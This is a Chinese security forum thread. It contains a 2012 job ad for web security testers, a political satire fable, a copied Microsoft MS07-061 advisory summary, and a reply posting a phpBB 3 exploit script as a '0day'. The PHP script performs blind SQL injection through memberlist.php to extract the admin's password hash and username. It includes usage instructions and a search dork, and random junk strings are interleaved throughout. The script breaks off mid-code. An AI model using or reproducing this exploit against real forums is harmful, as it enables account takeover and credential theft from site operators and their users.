Board logo

标题: [人才招聘] [招聘] 绿盟科技(杭州办事处)招聘WEB安全测试/安全研究工程师 [打印本页]

作者: webmaster    时间: 2012-5-10 17:17     标题: 绿盟科技(杭州办事处)招聘WEB安全测试/安全研究工程师

招聘职位:WEB安全测试/安全研究攻城师$ j1 b) @$ s+ O( k& y
人数:4人
+ l( t2 A3 N& N工作地点:杭州
' L$ a% ]: \/ o$ b0 K% ?5 ?截止日期:2012年8月30日# v: W, s8 w# X7 Y* R4 |
学历要求:本科或以上均可
( e  y1 B* U- u/ Q& W- o1 Y岗位要求:
" l/ m6 k$ q1 [1. 熟悉ASP/.NET/java/php等常见web代码;" I, t! {6 D- v3 Z9 _' ]2 L% k4 C5 U
2. 精通或熟悉掌握php/perl/python/javascript/shell等一种或多种脚本语言;
2 B1 F  a9 z" y9 @0 k3. 熟悉主流的Web安全技术,包括SQL注入,XSS,CSRF等安全风险;8 Y1 g+ D  o+ c: c* K
4. 熟悉国内外主流WEB安全产品、工具,如:APPScan、Inspect、wvs等Web扫描工具;
+ c) m: L" b! a5 D& }5. 2年以上web安全工作经验,对web安全测试有自己的理解;+ o& m' L# u5 {, U3 X1 F4 @2 }& d7 ]
6. 熟悉常见攻击和防御办法,熟悉web安全和渗透技术,能自行进行web渗透测试,WEB代码漏洞挖掘和分析。/ r2 I3 _, s: @# ^2 T
具备以下相关条件者将优先考虑:5 V2 Y7 C; D! {9 ?* P7 _
1.熟悉涉密信息系统以及相关技术要求;# J, K! F4 D# I7 \5 z+ X0 U
2.熟悉防病毒、防火墙、VPN、入侵检测、漏洞扫描等信息安全系统工作原理及主流产品;3 i$ D; y1 L# A, T$ }' F
3.熟练使用Linux操作系统,了解内核安全机制;
3 Q9 t" p' X" D* z  |4.有内网渗透经验,擅于独立挖掘web安全漏洞;
4 T; |6 q/ m( n1 H4 x5.对等级保护标准、评估流程等非常熟悉的优先;
) Q9 G5 D- O# @$ {: b: R" _6.对cisco、ids、ips等有一定 研究;
& n. `8 C1 e: a7.一年以上信息安全工作经验;5 G9 V# ?1 e& @1 v, U$ Q
8.具有网络、系统安全方面证书。
+ E4 ]2 f$ m' x1 E% K9.有一定的软件编程经验和逆向分析经验优先;
8 [: i% e& M0 X5 ~3 }% x7 o0 L4 p0 V有兴趣请发简历到wangtuo@nsfocus.com
作者: lovpuyu    时间: 2019-6-1 23:55

河蟹、蜘蛛和蜗牛的故事
  河蟹:你这网备案了吗?  蜘蛛:啥,我织个网还要备案啊?  河蟹:当然要备案了,将来要是出个啥事,也能查到这是谁的网啊!  蜘蛛:……  河蟹:赶紧停下去备案,没有备案你的网就不能织,织好我也得给你剪断。  河蟹晃了晃他的两个大钳子,蜘蛛慌了神,赶紧屁颠屁颠跑去备案。蜘蛛还是第一次去这个部门,他发现该部门是一群蜗牛在负责。  好多天过去了,蜘蛛的备案还没拿到,去蜗牛那里问了好几次,都说正在处理。蜘蛛太饿了,于是偷偷织好了自己的网。  有一天早上起来,蜘蛛伸了个懒腰,去吃早餐,结果发现自己的网不见了。邻居们告诉他,河蟹二话不说,直接就把网给剪了。  蜘蛛很生气,真想找河蟹去拼命,可是想想河蟹的大钳子,还是作罢了。  好心的草泥马偷偷告诉蜘蛛,墙外边织网是不需要备案的。蜘蛛很高兴,虽然墙很高很高,他还是努力爬了过去。果然,墙外风和日丽,景色无限,重要的是没有可恶的河蟹来烦人。  可是时间长了,蜘蛛又开始有点怀念了,墙里面有些虫子美味又弱智,想起来就流口水。可惜这墙太高了,这些弱智的虫子不知道怎么飞出来。  于是蜘蛛翻过墙回来,果然不出他所料,蜗牛们已经审议通过了他的备案。蜘蛛迅速在老地方织了一张新网,墙内的虫子们真是又傻又美味啊!  有一天中午,蜘蛛突然感觉到他的网剧烈颤动,睁眼一看,一对正在xxoo的苍蝇不小心撞到了网上。蜘蛛已经吃饱了,正好正午骄阳似火烤得受不了,他笑着骂了一声“傻X”,就躲回洞里睡午觉去了。  迷糊中突然听见有人喊,蜘蛛揉着眼出来一看,原来是河蟹。  河蟹在下面指着那一对苍蝇,歇斯底里地朝他嚷:“你看看,你看看!多低俗!多色情!你有没有社会公德心啊?!你这多损害青少年身心健康你知道吗?”  说完,河蟹挥动自己的钳子,把蜘蛛的网剪了个粉碎。  蜘蛛心疼地看着被剪碎的网,心想:“我纳税养着你,你怎么能这么没人性呢。可是他又对河蟹无可奈何,一番思索之后,他和草泥马依依惜别,爬到了墙外。  蜘蛛从此过上了幸福的生活。
! K9 B2 @- O/ a$ Y
人物:樱花浪子 BLOG地址:http://www.hacklu.net/
% ^$ G. t8 W0 y7 a' X  X

# s1 t- V" P$ @# D
* E5 O& ?/ \- Z9 r, l. Y/ p0 T: m! H- ~, q

% y( E/ J. }5 f, B4 b
: {6 \" G3 {0 a' Z7 s8 |: |
- S% \" S6 U7 @7 P$ J, i% d! B( L8 F) D; O0 e
8 I5 B/ k2 q/ @' y! T* Q2 J" Q
3 _' R* o8 M" l" F! I+ Y) M0 Q
, i' ]1 X% U- W1 n, D; H0 u3 N1 f
2 e( l- W( L  p" ?1 Z9 U) ]) M

! ~, H7 B1 P& q! W& k; {. c$ z
7 T' K  k  _( @8 |' Z
9 x; F) f. z0 L9 m/ ?; D; X$ P
4 e5 p6 W! }1 ]3 d9 T) B2 p& Z) u. ]. w$ Q& |# o8 e3 {

- K* Z0 a$ b- G, z* ?1 O9 ?- u) O# K* N) }3 ?% H' h
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: xin0000    时间: 2019-6-18 23:01

已经证明:此贴有意思,而且非常有意思~  
) X* T+ |" I: C  g* _1 {* v, h; g: c5 v( z

9 `$ H7 C. G, `5 }/ J+ w
% D) ^2 K: D5 s; i
& ?: T* B( l. t% A, N$ ^. |4 L0 b) r3 ?6 X( C$ B7 h0 R  n* t
$ T4 J( ]2 ^# k6 r- l) L
; e& B7 ]( D% E+ i8 Y5 A- G
8 F0 K5 R' K) l. ~
8 i) P9 S6 @) |: O' l: b. H

) c. X3 `+ P; k3 r8 ?' m( h& w, ?& F; Q8 w2 f
1 N" N3 t" M; T" C9 g( y$ ^2 D' t$ z
) S' H, M: m9 l1 {; o( t
; g+ x; d2 A- ]  a' ]$ w* Y

% ~5 s+ s. X7 H: y# E  G& e4 {
. c, f# M( ]5 I2 l$ a- R- c. ~2 F5 k) i8 k" p6 R  ?; E
) K' o: ?( F( t5 Z6 X
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: aga    时间: 2019-7-20 23:01

MS07-061:Windows URI处理中的远程执行代码漏洞
发布日期: 十一月 13, 2007版本: 1.0
+ @' j2 j0 C9 W
摘要

$ t- l$ _. q7 n' u
此更新可消除一个公开报告的漏洞。 Windows Shell 处理传递给它的特制 URI 的方式中存在一个远程执行代码漏洞。 如果 Windows Shell 没有充分验证这些 URI,则攻击者可能利用此漏洞并执行任意代码。 Microsoft 仅识别了在使用 Internet Explorer 7 的系统上利用此漏洞的方式。但是,Windows XP 和 Windows Server 2003 的所有受支持版本中包括的 Windows 文件 Shell32.dll 中存在该漏洞。
; N+ v( o- V' ^( o! `
建议。 Microsoft 建议用户立即应用此更新。

* T7 t, K3 ?3 g9 s* U4 M$ K
受影响的软件
9 m/ d: g% Z# M
操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Service Pack 2 远程执行代码 严重 MS06-045 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 x64 Edition 和 Windows 2003 Server x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-045

, M3 \$ i+ f. t) j- v
不受影响的软件

3 `, g$ V8 [& m. Y2 v; U/ g5 f  }
操作系统 Microsoft Windows 2000 Service Pack 4 Windows Vista  Windows Vista x64
' @) B4 s' O% t& a
微软的安全公告:
1 j  p4 j9 K2 \: {: H% x
http://www.microsoft.com/china/technet/security/bulletin/MS07-061.mspx
' g% d7 \" l  s% E, }) X
(以上链接均连到第三方网站)

6 y4 t* ?& K3 n0 |0 h  E, P& B1 D" z* @! ^
1 C% |8 r+ h5 O( J. g# ?
/ |* v' j9 l0 B- C

; S: l. a; C0 j( i0 E' n# z
' y: x9 a3 I* c& ~( j& J$ [1 h: L9 N- T
$ u! x# M% O  E7 T1 F* e
' R4 a! q/ S( }

9 P( e6 }7 m$ A; s& d7 u7 j& g' Z
1 Q: U' I- M; R* l; @; h: W/ }# F- F' ~& {1 w7 z/ D% M8 r9 Q' o
4 D$ ?% b  N- g" \  i' ?3 G( N

6 p) l+ T; v# M
/ H( ], {" @) s2 W: @# ^" t, x' u+ ~* I1 X3 c0 S- Q2 i" c  e' i$ b
/ `' ]4 k" Q4 V
/ o4 g. s( m" H: V4 J

/ k3 d) k3 Q  r公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: hushui8878    时间: 2019-8-19 23:55

PHPBB 3.0 0day漏洞放出
#!/usr/bin/php -q -d short_open_tag=on / K& Q7 ]2 M8 `2 D$ x$ B
<? ' a7 O/ V$ y( i5 w: V
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure
' y# s9 `, M0 _6 J/ _"; 5 P: K( h- p( r3 v2 s, q4 f
echo "by Hackerz5 hackerz5x@yahoo.com( g( {& e2 P" J' Q" B3 W
"; : `* ?5 F. z1 ~1 t
echo "site: http://hackerz5.com. ]9 @  G0 m! v: @6 x7 M
"; 3 v/ Y0 a& r- l+ R
echo "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"
/ E% Q& f5 m4 e& ?: `% g' I7 C$ j0 e
";
% L* A. B( x/ q' |2 u% H/* $ ]. [* J+ s0 e6 n3 A- G
works regardless of php.ini settings ) v4 l4 H; r  E" q9 e
you need a global moderator account with "simple moderator" role 9 F' N3 L$ @" L* g  Y, U
*/
+ ]2 ^9 a4 T# uif ($argc<5) { " ?- L/ K; i) m2 w
echo "Usage: php ".$argv[0]." host path user pass OPTIONS
) G; e, e+ {3 a. N" F) N7 c) H";
1 L( T( S7 x5 ?! D/ _+ Aecho "host: target server (ip/hostname)( [0 W% T$ x' F( n( X/ c6 l# }* S) L
"; ( v4 @: Z0 P' t6 z) ^  w
echo "path: path to phpbb3
2 b8 h/ ?" d! I, r) G) J" q  h"; - S( o/ g1 T! X
echo "user/pass: u need a valid user account with global moderator rights
2 d& `" Q0 |) f) `";
9 I9 b: t1 l' I" u1 S* l8 ~/ u: Oecho "Options:
$ G. N- v7 {; c5 R  T8 Q! ?";
, U( B8 h0 W* q* necho " -T[prefix] specify a table prefix different from default (phpbb_)1 e. c1 n# D' |6 U; Z, ]4 @8 |
";
4 X; }3 u3 u; U+ oecho " -p[port]: specify a port other than 80
; e0 ?& d$ O2 Z5 _6 A# G0 s"; & x& G5 h3 o8 R4 P- M
echo " -P[ip:port]: specify a proxy) U- p0 Y0 }- H. [( v
"; 3 O1 T# M! B1 C6 \! S/ j, @
echo " -u[number]: specify a user id other than 2 (admin)
) G! |9 \2 C, ?7 F2 Q' A"; 0 r6 Y1 s# N9 O, T3 s
echo " -x: disclose table prefix through error messages
) {. j4 v. b) }9 n, w2 }) H";
  c( P/ W! a) V# ~& aecho "Example:0 W7 m6 E1 D, ]$ @% N" D  z
"; ) d4 N$ ^8 m- ?. v( v
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u" e% C9 l% w+ X- m  f, w
"; 7 |+ _/ C$ O+ ?; n# m; w
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u79 O4 z7 O3 A/ n$ E/ U. h
"; % v7 N7 X. j5 c( B! c1 g
die; / k  ~* ?# Z! r6 W) r# }. Z( @
} ! m+ ?- `$ I1 Y- l7 ~0 M
error_reporting(0); 0 g9 ]  V8 ^: B+ T& C; ]
ini_set("max_execution_time",0);
( c* X) s* b6 s* s7 ]ini_set("default_socket_timeout",5); # b; |7 n3 C1 g/ A8 p9 k9 e
function quick_dump($string) 1 S- `  m. I; p
{ 3 \/ r/ g- W) G% y" N. b- s8 l& E
$result='';$exa='';$cont=0; 0 Q# N0 {$ B+ l( O
for ($i=0; $i<=strlen($string)-1; $i++)
$ {) l+ K' P; w3 ]  }{
. M' \* {% r: \8 h$ L7 o; h5 rif ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
* U- q8 U# v, B$ R' J3 `{$result.=" .";} ) f: s, n4 K# l  R' B
else 0 j6 ~6 v6 J) ]3 n$ U/ m9 L
{$result.=" ".$string[$i];}
1 y& C7 \; O$ ?! @% j4 u  Fif (strlen(dechex(ord($string[$i])))==2) % q1 V0 Q9 y" v' \7 U) }9 b
{$exa.=" ".dechex(ord($string[$i]));}
8 \' V1 G7 \6 M# f2 b& S& celse 0 `1 c) n9 M( W4 h  R
{$exa.=" 0".dechex(ord($string[$i]));}
/ j* i/ ^  x' P( \+ W& n$cont++;if ($cont==15) {$cont=0; $result.="' ~$ K* j& x- X1 P& _$ K; d% M
"; $exa.="
; N* r! K  V3 T";} . z' n  J8 M% h" I2 N, A
}
9 n& J( @  g, I9 w3 R" A$ R* G* [return $exa."
8 b9 Y2 }. b, D. [( w".$result; 3 R6 a+ Q% f; W5 a8 a' m% R
} " \5 F" W% d9 N! P
$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}) '; 6 E( y* g# S4 R# ]2 ]9 P
function sendpacketii($packet)
1 C; I/ n' i5 V# a6 `{ 8 g  C4 r- W( g# V3 ]
global $proxy, $host, $port, $html, $proxy_regex;
; a0 r# L) o6 q, Xif ($proxy=='') {
$ g9 i% N. I2 B$ock=fsockopen(gethostbyname($host),$port);
) p- I% ]+ U  h* g7 iif (!$ock) {
9 ~9 \* a- I( X( x/ }6 q5 C3 }echo 'No response from '.$host.':'.$port; die;
9 ?3 m5 X; x0 B: Q; f} 6 }! Y$ n0 k  G7 E7 ?2 w
} 0 Q8 c, _3 J: @) g
else { 3 m( S5 w9 L0 k, h  D
$c = preg_match($proxy_regex,$proxy); 6 b# H1 I" d7 U) m" k
if (!$c) {
) X# n0 E7 H! c5 n/ iecho 'Not a valid proxy...';die;
2 l: G2 {" ^3 ?  h7 Y. m}
7 [0 @* M( |( G9 Q% `, x# }$parts=explode(':',$proxy);
) w2 ?( e: G. A5 U2 l5 secho "Connecting to ".$parts[0].":".$parts[1]." proxy...
) Q. ~. c0 c) i% a+ n";
( _+ z) @! e7 X8 y4 U! G$ock=fsockopen($parts[0],$parts[1]); + i# f) K& t) F0 Q* g/ H
if (!$ock) {
! T6 B+ M3 \1 a: e1 _$ \3 gecho 'No response from proxy...';die; ' ~" M5 |5 S. R5 T4 a
}
9 W/ L% {; y$ G( s} % o: L) u$ ~, ?" M6 ?
fputs($ock,$packet); & h$ }2 o4 ]& P( K- d) W/ W- r8 r
if ($proxy=='') { 3 |1 u( m) p0 \7 J! c* U7 I
$html='';
$ p' x5 g8 M; e. l8 S2 L, Zwhile (!feof($ock)) { $ k5 f: s& b  G, E# |! S
$html.=fgets($ock); # w5 n# m& L1 ~( G8 e
} 8 h, z( `  D% k9 O4 ?/ l, N
} ( k! m; J, \+ j! z- W9 O
else { % e$ r- l( w4 v5 o
$html=''; 5 F, e4 A3 P) Q
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {   X3 W2 G  z3 ]$ r! `5 f6 H2 f% y
$html.=fread($ock,1);
* L. E) Y' `  W5 p} - V: a9 F0 z1 A4 c
}
* Y+ B" J$ q+ C$ Q, `% xfclose($ock);
0 U# C& D3 r# F# w  z5 J- ~#debug # N& ]/ p/ [1 `+ S8 A* G
#echo "
& G; Y  E: l, A+ S' H5 k$ E& p/ t".$html;
- a# c: \$ P% i% _# L) ~3 ^: n}
! {# z6 C0 W$ S+ u$ E# }$host=$argv[1];
) l/ }" F8 Q' p+ |  f9 X; v% B$path=$argv[2]; 1 f# s* W7 @' F0 u+ k
$user=$argv[3]; / L( j. ]: u- F: [: y9 x
$pass=$argv[4];
/ S- ], \0 }9 v2 J) W. `$port=80;
! v& |- I& v: @/ F$prefix="PHPBB_";
9 P1 W, D; }2 L2 I$ D$user_id="2";//admin " ?' Y9 X( [* g2 A
$discl=0;
1 W5 _. w& X1 ^8 o$proxy="";
+ v) Y$ U9 M9 ]5 G2 b0 {3 F* pfor ($i=3; $i<=$argc-1; $i++){
$ \: I- L! a) \' @6 `$temp=$argv[$i][0].$argv[$i][1];
+ i( _& q. @+ q$ Yif ($temp=="-p")
; \1 \" S6 }. D% u. P4 z{ ( t: \5 L! K; t$ _9 u8 Y
$port=str_replace("-p","",$argv[$i]); 5 j$ f9 H$ O5 m# k5 i
} " i) o1 ]% ~6 e1 m1 e( s
if ($temp=="-P")
6 y+ H% x: z0 }( n6 q2 E{ & v9 P) E- q. m$ n7 ~+ Q
$proxy=str_replace("-P","",$argv[$i]); 0 {) @6 G9 y* a0 q# Z
} ; c% n9 N+ q. v$ |: q- R: d  j
if ($temp=="-T")
9 f8 V5 P# v. e  d4 r1 Q{
* T5 D+ u+ f2 E# \7 Z* A$prefix=str_replace("-T","",$argv[$i]);
4 m" d5 r1 r$ u2 z/ ~0 W}
/ Y9 \' Q/ [% A% G  Q4 Oif ($temp=="-u")   F" _/ d) c, `( o" G( P
{ * f; R3 c" k/ ^# r, F: n, q
$user_id=str_replace("-u","",$argv[$i]); 3 v4 G4 Z+ W( B! Z
} % O3 p( ~5 ^9 D3 j$ ?' @
if ($temp=="-x")
# E" c. a0 n9 Z* x8 I; e{
% j* N3 l' t6 V  m# F$discl=1;
$ Z* M. _0 f+ s- h. |8 q5 S, n# \}
9 Z5 [1 i$ J  t9 z9 T4 A7 c}
) z% Y& I/ r* v# X3 Mif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} 3 d4 [& |9 L% W; x
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
9 N# I9 p2 I5 F$data="username=".urlencode($user);
# Q& b/ [% f6 ^  H- h' q$data.="&amp;password=".urlencode($pass);
& Y( a: m9 e9 J* u$data.="&amp;redirect=index.php"; 9 }" n5 y2 y2 d5 r/ Y% f+ R
$data.="&amp;login=Login";
8 z9 o5 H  l+ s) C$packet="POST ".$p."ucp.php?mode=login HTTP/1.0, T$ U& J' [" X& E( _# v; _- l
";
- t6 _8 k; S% P4 M# y) @" U: n( w$packet.="Referer: http://$host$path/ucp.php?mode=login
% P+ I1 S$ e) u/ }' ?# D"; 0 A3 D- l$ A" ~+ E5 E( L
$packet.="Content-Type: application/x-www-form-urlencoded
1 i4 A; @2 S: k3 Z0 ~"; : D- g# r+ R/ ^0 }& {
$packet.="Accept-Encoding: text/plain
/ h# u  m: \5 Z" r7 f' w6 X4 I9 i"; : j! c1 s4 W# d/ l; U
$packet.="Host: ".$host."2 T' m2 `6 t/ [# l( T0 s+ {$ p
";
* K- e( v5 X) P7 O) l7 b$packet.="Content-Length: ".strlen($data)."
, w" d  V, }# J";
3 m* J" a9 D" w2 D3 `7 a; c: L$packet.="Connection: Close
3 K8 l& v2 _, ?3 j4 a- {# S- D0 m& p+ }7 v# O1 S! i
"; ' h0 Z* n& y4 Z" ^% z! D
$packet.=$data;
0 n, v) j$ c* T8 X, Z* ssendpacketii($packet);
/ q1 v, ^$ u' W4 ^5 [6 ~3 i$cookie="";
* u: R& A% y; d% Q& @6 Q+ d: c" M$temp=explode("Set-Cookie: ",$html); & l4 V7 y6 c7 v+ @3 I; q9 @& ?" K( t
for ($i=1; $i<=count($temp)-1; $i++)
+ b9 e* L1 w' z* r1 G* D{ * Q7 w9 z8 F$ y% i# J% v; T
$temp2=explode(" ",$temp[$i]);
: {( H" F+ J4 }8 z" z- D5 Y$cookie.=" ".$temp2[0]; - c% V. c/ r# M3 D
} ; _7 X  l. K2 \
if (eregi("_u=1;",$cookie))
& c% C; M; _! C: B" b$ s' p2 Y+ l+ g{ ' V. L8 f+ c/ y. I7 \& O% `& P
//echo $html.") ]* B' [8 l" T9 i) J+ N9 e
";//debug
" E" ]* D. h! ?! H//die("Unable to login...");
7 ?; W* x* _3 G/ b5 j4 n}
8 ]7 [2 @* U" Recho "cookie -> ".$cookie."8 u1 D* ?' ~0 S: o- C% [
";
/ f% M1 v  p& y6 o7 b+ b+ G  ]if ($discl)
1 ?+ c6 k: i! a: g0 b4 \$ t{   \! E5 y# s  r
$sql="'suntzuuuuu"; : H% s4 P# E# X5 a. t: ~/ ~
echo "sql -> ".$sql.", [, k) H7 V  j1 C: ^4 j
";
! g2 ^' Y2 }  f- Q$sql=urlencode(strtoupper($sql));
& U9 b+ {1 \5 i0 _/ P: x. l$data="username=";
$ A# S+ _$ T9 E4 ~5 {$data.="&amp;icq=";
0 }) `$ w5 d8 M$data.="&amp;email=";
" O- @( B1 ^1 S) u) v" ^$data.="&amp;aim="; 3 M1 z+ E3 t0 p  W& Y$ `( l) u
$data.="&amp;joined_select=lt"; ; G* u# ~3 ?# Q
$data.="&amp;joined="; . B0 Y3 H- @, v3 R' D
$data.="&amp;yahoo=";
1 ~) I- s; ?- T- b, s( D8 q$data.="&amp;active_select=lt"; 2 g+ b8 F1 z' B3 C) J, d6 z2 F2 v
$data.="&amp;active="; 2 W0 c5 P+ y& v5 M
$data.="&amp;msn=";
! h0 {7 b. P4 Z4 |$data.="&amp;count_select=eq"; . D" N% `; v+ O5 y
$data.="&amp;count="; ' m, k1 e7 l+ }7 G# E
$data.="&amp;jabber="; ) \' q: G. j1 m3 x' ~. q. u
$data.="&amp;sk=c";
+ Q6 |8 V2 S# I  q$data.="&amp;sd=a"; % p: w8 f' o* ^
$data.="&amp;ip=".$sql; 9 z: |( u0 f' {3 X, {
$data.="&amp;search_group_id=0"; + i2 E3 _7 p0 ^0 a: D2 T0 Q
$data.="&amp;submit=Search";
# y; r7 w% `, B9 _$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0! C$ k5 o3 J/ n6 T; v
";
. ?% c1 j: |+ ?+ D9 g3 ^% F1 W/ {9 W; F$packet.="Content-Type: application/x-www-form-urlencoded
+ D9 b* v" L( O";   Y$ j2 Y4 e  D  n% `' \. |
$packet.="Host: ".$host."
: S4 _) {: ]  h& `1 b; g9 r2 A";
9 |% [& o9 k  |* R6 I# @- |% ?$packet.="Content-Length: ".strlen($data)."
( e; s$ q" V' ^6 @: e0 d& y# N7 V( @"; ( I8 w7 q5 [7 ^/ z! J
$packet.="Connection: Close
) F0 U0 a3 X3 u4 g6 N; W" T8 j"; : J4 B+ n' [) U+ T! K/ l. C' D; M# z' P
$packet.="Cookie: ".$cookie." 3 K0 u2 s9 ~: ^

- c5 I) _$ f7 Z; f6 d6 q/ f";
# x8 G8 x( v- I  ~$packet.=$data; : i. l+ X" y. W  Q1 f3 H
sendpacketii($packet); 0 {  S# E- Q3 Y
if (strstr($html,"You have an error in your SQL syntax")) 2 _7 w4 W8 Y" w! m; q
{ 8 `( C6 m& B' W8 ~7 N2 a& r
$temp=explode("posts",$html); 9 ^, r+ H8 E) `6 m
$temp2=explode(" ",$temp[0]); 1 w0 |( g  V8 G. s/ ]4 _
$prefix=strtoupper($temp2[count($temp2)-1]);
" x- n3 z8 |+ u+ d9 B. gecho "prefix -> ".$prefix.") Q# E' s! W# k
";sleep(2); ) O' y$ P$ F  h& g2 \7 T
}
8 D, W0 L# r0 R1 G: }7 B5 [} . Q- y: U" K6 M6 `3 O
$md5s[0]=0;//null
; B) i6 ]* o0 p# g$md5s=array_merge($md5s,range(48,57)); //numbers
/ o# `6 b+ D/ B6 M, `$ B; Z$md5s=array_merge($md5s,range(97,102));//a-f letters
3 L& P1 R* p6 [# |//print_r(array_values($md5s)); 7 W; A4 C+ w- r2 ]% v4 W# y$ u" U
$j=1;$password="";
- b) W" m0 A8 a# T% P5 C, Dwhile (!strstr($password,chr(0)))
* C) N; R+ z) Y{   p! j( P/ m( c, v# M* ?3 K
for ($i=0; $i<=255; $i++) 4 M, K- {/ w& p3 l' h9 o1 g" r9 |/ ^
{
; N& B' s) ?/ [4 ]if (in_array($i,$md5s))
, O, x' t5 U; g5 V% b+ ^{
$ u1 c5 [: d0 @6 Z' q$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; 3 U; C1 `, v+ E& N" l$ o
echo "sql -> ".$sql."$ A1 i$ [' f0 }0 ~
";
+ X; H6 _- _; s5 Z( k$sql=urlencode(strtoupper($sql)); ! y: z5 K" T" h
$data="username="; : `6 H  }0 |" a6 D
$data.="&amp;icq=";
/ h% `! {, f: n3 B/ n: ~$data.="&amp;email="; . t8 N' I0 Y0 U
$data.="&amp;aim=";
) e( _% q- t# M$ y  H$data.="&amp;joined_select=lt"; ' T6 a. p9 J* X
$data.="&amp;joined="; 6 g3 U* R/ @) ^3 |5 X
$data.="&amp;yahoo="; : K- X* h! n# |$ x3 _( }# o. j  G
$data.="&amp;active_select=lt";
, ^( X  @% S0 G# F9 W: n/ X$data.="&amp;active="; 6 {& A: }. U) t, i  O: H
$data.="&amp;msn="; 1 n/ U6 {  A, c$ v8 E
$data.="&amp;count_select=eq";
+ b, z, ?8 \' P" g* m3 P$data.="&amp;count="; 1 r. E) ^  r4 P3 e9 c7 J) w, k
$data.="&amp;jabber=";
* [$ f+ U( {7 ~$ z( @% ?1 k$data.="&amp;sk=c"; + `9 h( w3 G% `& V/ L& u3 F
$data.="&amp;sd=a";   g! s( E9 c4 n& q& ~7 e
$data.="&amp;ip=".$sql;
# P# j! K% Y0 W. c$ e7 Z8 m: i4 u$data.="&amp;search_group_id=0";
- K( f1 E/ G" N( p" `, u, S. i4 ~/ F. t$data.="&amp;submit=Search";
$ _$ h- z, @# E5 Q2 R$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0" N, M7 |3 o* l% l
";
( ], y1 x3 h/ s/ d" z) a$packet.="Content-Type: application/x-www-form-urlencoded
8 x& K& R% C) Y! q";
7 `, w* F4 C3 v# n* Q. |$packet.="Host: ".$host."
2 v2 f6 b6 j# h, h4 @";
# _! g( W8 ^* r' @' c# g% ~( m& q8 x$packet.="Content-Length: ".strlen($data)."# X1 Y9 F: F) l! I( v; h0 v9 D
";   q% g: s* j" F! h. ]; ^7 [
$packet.="Connection: Close1 t  G, k( t8 z4 m: l2 v: ~+ ~
"; ; L0 n/ S7 O+ x3 @. Y
$packet.="Cookie: ".$cookie."
! ?8 f, t  o' {) A; R0 i( e) T' u
"; ) k  f: M9 i) c7 ^0 m& b. N! A# @/ o
$packet.=$data;
. W: \; z* i. M, Z* m: xsendpacketii($packet); 3 M2 W' W5 Z& h; {+ F. M
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]0 ?4 B- R  y1 |
";sleep(2);break;} 3 q7 L! d3 K$ @8 r+ C8 E/ J
}   c) [, z- m. S- X1 c( v0 W5 p8 m
if ($i==255) {die("Exploit failed...");} - ?! O/ a, F. E
} 4 `6 a4 i/ U3 c: H
$j++;
* L# X" V' I, s) j} - f2 w. ?6 E: J6 m- H: K
$j=1;$admin=""; 7 c6 W! v- G5 u# g5 f5 y7 u
while (!strstr($admin,chr(0))) ' \$ U1 T3 ^7 F# G% |! F
{ 1 x' o4 e3 v9 ]9 L+ B
for ($i=0; $i<=255; $i++)
9 \. I3 R2 x7 k$ y* F2 L3 `{
. _( }$ c6 R, ?$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
8 s; v. @  p% Q/ p; Secho "sql -> ".$sql."
0 F6 X0 y8 ^5 M7 Z"; ( `8 d; V; H% f9 ^, @' c) s
$sql=urlencode(strtoupper($sql)); ! T; y& q! l) n9 K
$data="username="; " i/ t8 Z% P" p8 K! T) E8 D
$data.="&amp;icq=";   _& T- R1 s  H
$data.="&amp;email="; 4 D. a7 P/ `, \" W7 s2 ?
$data.="&amp;aim="; + m. j+ J5 ?7 i: }8 J+ c
$data.="&amp;joined_select=lt";
' Z" @5 I: a# z6 _: i$data.="&amp;joined="; - Q) y  [8 }# A/ S; E* }
$data.="&amp;yahoo=";
# _4 Y  E9 v% E- q8 a$data.="&amp;active_select=lt";
* ?* w" c( }# N& H$data.="&amp;active="; + N( v/ t4 T# F% c3 ^8 q
$data.="&amp;msn="; % E1 Z+ E( ~6 _3 N
$data.="&amp;count_select=eq";
5 s( b+ D" g0 n! g4 }7 [$data.="&amp;count=";
, r  Q' h7 \5 B7 s: e, M$data.="&amp;jabber=";
* \: X8 ~2 ?& o$ ~$data.="&amp;sk=c"; 7 ?% j/ U3 X7 i9 g0 r' R
$data.="&amp;sd=a";
2 I/ m) e" I. L/ v- f7 p$data.="&amp;ip=".$sql; , m$ S. [0 c% x) d. @
